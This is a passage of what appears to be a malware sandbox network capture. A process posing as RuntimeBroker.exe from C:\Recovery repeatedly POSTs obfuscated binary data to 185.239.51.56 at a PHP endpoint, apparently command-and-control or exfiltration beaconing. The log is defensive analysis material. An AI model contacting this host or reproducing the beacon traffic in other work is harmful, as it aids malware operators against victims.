                                                                                                  Jan 1, 2025 02:27:28.096937895 CET2504OUTData Raw: 56 53 5e 55 5f 5c 5e 51 5f 5a 5a 53 57 5e 56 5f 5f 5c 5d 42 51 52 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VS^U_\^Q_ZZSW^V__\]BQRWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['("_#"(2$X8%($2(X65! (?T$( _1'*:"^%#[.
                                                                                                  Jan 1, 2025 02:27:28.495448112 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:28.653047085 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:28 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  22192.168.2.449763185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:28.786537886 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:29.143850088 CET2504OUTData Raw: 53 59 5b 54 5a 5d 5e 54 5f 5a 5a 53 57 5f 56 5f 5f 58 5d 48 51 54 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY[TZ]^T_ZZSW_V__X]HQTWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][')?>["T$['#3,-=$2X?+)["% (#Q3] [%$&9-"^%#[.>
                                                                                                  Jan 1, 2025 02:27:29.515300035 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:29.653983116 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:29 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  23192.168.2.449764185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:29.930107117 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:30.326685905 CET2504OUTData Raw: 53 5e 5b 54 5a 5e 5e 53 5f 5a 5a 53 57 51 56 50 5f 5a 5d 49 51 52 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[TZ^^S_ZZSWQVP_Z]IQRW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<<"0Z%/>)?2*("5"4'3&$"]."^%#[.
                                                                                                  Jan 1, 2025 02:27:30.635404110 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:30.643574953 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:30 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  24192.168.2.449765185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:30.794894934 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:31.143925905 CET2504OUTData Raw: 53 5d 5e 56 5a 57 5e 51 5f 5a 5a 53 57 58 56 5e 5f 55 5d 47 51 5c 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S]^VZW^Q_ZZSWXV^_U]GQ\W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['</=6"8X2#X,!+:?5Y"& 'Q'( 1'"_9"^%#[."


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  25192.168.2.449766185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:31.353368044 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:31.706341982 CET1600OUTData Raw: 56 53 5b 55 5a 5a 5e 50 5f 5a 5a 53 57 5a 56 53 5f 5c 5d 48 51 53 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VS[UZZ^P_ZZSWZVS_\]HQSWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['+-!T/10$Z/-!<2X<8%5"X#;4'$]&'-.="^%#[.*
                                                                                                  Jan 1, 2025 02:27:32.063597918 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:32.070955038 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:31 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  26192.168.2.449767185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:31.472045898 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:31.831330061 CET2504OUTData Raw: 53 5f 5b 53 5a 5e 5b 56 5f 5a 5a 53 57 58 56 5e 5f 55 5d 46 51 55 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S_[SZ^[V_ZZSWXV^_U]FQUWY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['E(<!!!0X&(-=.Z='"Y<^!5&6[4/$_2!-"^%#[."
                                                                                                  Jan 1, 2025 02:27:32.190228939 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:32.324203014 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:32 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  27192.168.2.449768185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:32.441804886 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:32.800178051 CET2504OUTData Raw: 56 5d 5e 5f 5a 57 5b 5d 5f 5a 5a 53 57 5f 56 55 5f 5a 5d 49 51 50 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V]^_ZW[]_ZZSW_VU_Z]IQPW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$</="2& Z8-!?':(%!%._"8 'Z&7.."^%#[.>
                                                                                                  Jan 1, 2025 02:27:33.174192905 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:33.180530071 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:33 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  28192.168.2.449769185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:33.380225897 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:33.737597942 CET2504OUTData Raw: 53 5d 5b 52 5a 57 5b 50 5f 5a 5a 53 57 5a 56 57 5f 5c 5d 41 51 5d 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S][RZW[P_ZZSWZVW_\]AQ]W]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?.[58Y138-Y=71<[#&>["(7'4^$7%9-"^%#[.*
                                                                                                  Jan 1, 2025 02:27:34.102540016 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:34.265361071 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:33 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  29192.168.2.449770185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:34.395034075 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:34.753231049 CET2504OUTData Raw: 56 5b 5e 5f 5a 56 5b 54 5f 5a 5a 53 57 51 56 50 5f 5b 5d 43 51 50 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[^_ZV[T_ZZSWQVP_[]CQPW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+6Y6<%,%(7.Y*("%6Z";?088$4>,="^%#[.
                                                                                                  Jan 1, 2025 02:27:35.095901012 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:35.104477882 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:34 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  30192.168.2.449771185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:35.240425110 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:35.597012997 CET2504OUTData Raw: 56 58 5e 54 5f 5b 5b 57 5f 5a 5a 53 57 50 56 55 5f 5f 5d 44 51 53 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VX^T_[[W_ZZSWPVU__]DQSWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['(,!2/'#--\(7&<86!5Y7($(]1',="^%#[.
                                                                                                  Jan 1, 2025 02:27:35.940613031 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:36.077573061 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:35 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  31192.168.2.449772185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:36.211234093 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:36.565721035 CET2504OUTData Raw: 56 5b 5e 51 5f 5d 5b 52 5f 5a 5a 53 57 50 56 52 5f 5b 5d 45 51 5c 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[^Q_][R_ZZSWPVR_[]EQ\W]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$?-"!,2338>.(2X?(Y5%%";?Q3 ]1$&_9"^%#[.
                                                                                                  Jan 1, 2025 02:27:36.932197094 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:37.069775105 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:36 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  32192.168.2.449773185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:37.090503931 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:37.440850019 CET1600OUTData Raw: 53 59 5e 54 5a 56 5b 54 5f 5a 5a 53 57 5a 56 53 5f 5b 5d 49 51 5c 57 59 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^TZV[T_ZZSWZVS_[]IQ\WY^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B<<1"!$Z%0 ,>.[=72?8)_"C" ;3P'8\$4>:"^%#[.*
                                                                                                  Jan 1, 2025 02:27:37.795023918 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:37.802158117 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:37 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  33192.168.2.449774185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:37.190767050 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:37.550216913 CET2504OUTData Raw: 56 5e 5e 54 5a 59 5b 5c 5f 5a 5a 53 57 51 56 5e 5f 58 5d 46 51 53 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^TZY[\_ZZSWQV^_X]FQSWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['(<*!"'2X;"X($)((>!>^#+ $(<Z&-:"^%#[.
                                                                                                  Jan 1, 2025 02:27:37.943321943 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:38.098577023 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:37 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  34192.168.2.449775185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:38.226448059 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:38.581341028 CET2504OUTData Raw: 53 5a 5e 56 5a 5c 5e 50 5f 5a 5a 53 57 58 56 55 5f 54 5d 47 51 52 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SZ^VZ\^P_ZZSWXVU_T]GQRW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][')<"Y5& (\;[6=42+5_"%=#($;$%99"^%#[."
                                                                                                  Jan 1, 2025 02:27:38.956531048 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:38.964437962 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:38 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  35192.168.2.449776185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:39.081208944 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:39.440772057 CET2504OUTData Raw: 56 58 5e 57 5f 5b 5e 56 5f 5a 5a 53 57 50 56 52 5f 5e 5d 41 51 53 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VX^W_[^V_ZZSWPVR_^]AQSW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C?<>Z"2013$X/-!<$1?(9X"5"#^(3;2Q.:"^%#[.
                                                                                                  Jan 1, 2025 02:27:39.791496038 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:39.799396038 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:39 GMT
